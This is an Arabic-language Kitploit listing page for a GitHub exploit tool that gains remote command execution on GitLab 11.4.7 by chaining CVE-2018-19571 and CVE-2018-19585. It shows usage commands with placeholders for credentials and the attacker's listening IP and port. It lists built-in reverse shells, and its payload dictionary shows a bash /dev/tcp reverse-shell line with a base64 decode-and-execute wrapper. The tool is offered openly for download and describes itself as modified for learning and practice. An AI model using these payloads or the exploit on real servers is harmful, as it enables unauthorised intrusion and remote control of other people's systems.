Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
gitlab-RCE-11.4.7 — GitLab 11.4.7 ثغرة تنفيذ الأوامر عن بُعد مع قذائف عكسية مختلفة. CVE-2018-19571 + CVE-2018-19585 | Kitploit
أدوات/GitHubGitHub/algafix/gitlab-rce-11.4.7
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرتطوير الحمولات
GitHubalgafix/gitlab-rce-11.4.7

gitlab-RCE-11.4.7

GitLab 11.4.7 ثغرة تنفيذ الأوامر عن بُعد مع قذائف عكسية مختلفة. CVE-2018-19571 + CVE-2018-19585

عرض المستودع
33منذ 5 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

gitlab-RCE-11.4.7

استغلال GitLab 11.4.7 CE RCE مع قذائف عكسية مختلفة.
CVE-2018-19571: https://nvd.nist.gov/vuln/detail/CVE-2018-19571
CVE-2018-19585: https://nvd.nist.gov/vuln/detail/CVE-2018-19585

تعديل على الإصدار من Sam Redmond و Tam Lai Yin بغرض التعلم والممارسة.

كيفية الاستخدام

هو مكتوب بلغة Python3 كما ينبغي أن تكون الأمور.

المتطلبات:

root@kitploit:~
pip3 install requests

الاستخدام:

root@kitploit:~
python3 rce_script.py -u <username> -p <password> -g <url:port> -l <local ip> -P <local port> [<shell lang>]

افتراضيًا، يتم استخدام قذيفة netcat مع الخيار -e.

القذائف المدمجة

القذائف المدمجة الحالية:

  • nc_e
    • Netcat مع الخيار -e.
  • bash:
    • Bash يتم تنفيذه بمسار مطلق.
  • perl:
    • Perl يتم تنفيذه من $PATH.
  • python3:
    • Python3 يتم تنفيذه من $PATH.
  • ruby:
    • Ruby يتم تنفيذه من $PATH.
  • php:
    • PHP يتم تنفيذه من $PATH. ملاحظة: عادةً لا يعمل في Docker الخاص بـ GitLab.

إضافة قذائف مخصصة

تحتوي بعض القذائف على أحرف لا تتوافق مع ترميز الطلب. لذلك يتم تشفيرها بـ Base64 ثم فك تشفيرها وتنفيذها على جهاز الضحية.

إذا كنت ترغب في إضافة قذيفة خاصة بك، قم بإضافة قيمة إلى بنية payloads_dict.

يجب تعريف ما يلي:

root@kitploit:~
'bash': {
    # If the raw_payload can be executed withoud encoding
    'safe': False,
    # Payload, must contain the references for the local_ip and for the local_port
    'raw_payload': 'bash -i >& /dev/tcp/{local_ip}/{local_port} 0>&1',
    # How to execute the payload if safe is False. Must conatin the reference for payload
    'exec_string': 'echo {payload} | base64 -d | /bin/bash'
}

إخلاء مسؤولية

تحليل HTML مقيد بشدة، قد يتعطل بسهولة.

تنزيل الأداة